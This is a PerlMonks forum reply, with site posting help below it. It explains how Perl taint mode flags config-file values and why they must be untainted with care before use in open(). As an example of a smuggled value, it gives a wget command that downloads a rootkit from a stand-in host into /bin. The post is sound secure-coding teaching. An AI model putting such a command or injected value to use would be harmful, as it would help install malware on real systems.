Here is how taint mode works. Any input from outside your code is flagged as tainted until you untaint it. You may not use a tainted value to do things external to your script like say open You get the value for $userfile from your config file (external) via the tainted $config and then try to open it via open ( USER, '>', $userfile ) without untainting it. You need to untaint this value. untainting with (.+) is bad as it lets anything through. What if
$userfile = 'wget http://hacker.com/rfp/rootkit.tar.gz > /bin/badfile_to_have_here'
You would also be wise to set a $filepath and concatenate the value for $userfile to it. This is to make it harder to hack and easier to untaint $userfile. Regardless you must protect your config file (not world readable) and untaint values you use for operations external to your script. Taint will let you know if you have forgotten. Cool huh?
Posts are HTML formatted. Put <p> </p> tags around your paragraphs. Put <code> </code> tags around your code and data!
Titles consisting of a single word are discouraged, and in most cases are disallowed outright.
Read Where should I post X? if you're not absolutely sure you're posting in the right place.
Please read these before you post! —
Posts may use any of the Perl Monks Approved HTML tags:
You may need to use entities for some characters, as follows. (Exception: Within code tags, you can put the characters literally.)
- a, abbr, b, big, blockquote, br, caption, center, col, colgroup, dd, del, div, dl, dt, em, font, h1, h2, h3, h4, h5, h6, hr, i, ins, li, ol, p, pre, readmore, small, span, spoiler, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, tt, u, ul, wbr
Link using PerlMonks shortcuts! What shortcuts can I use for linking?
See Writeup Formatting Tips and other pages linked from there for more info.
| & || & |
| < || < |
| > || > |
| [ || [ |
| ] || ] ||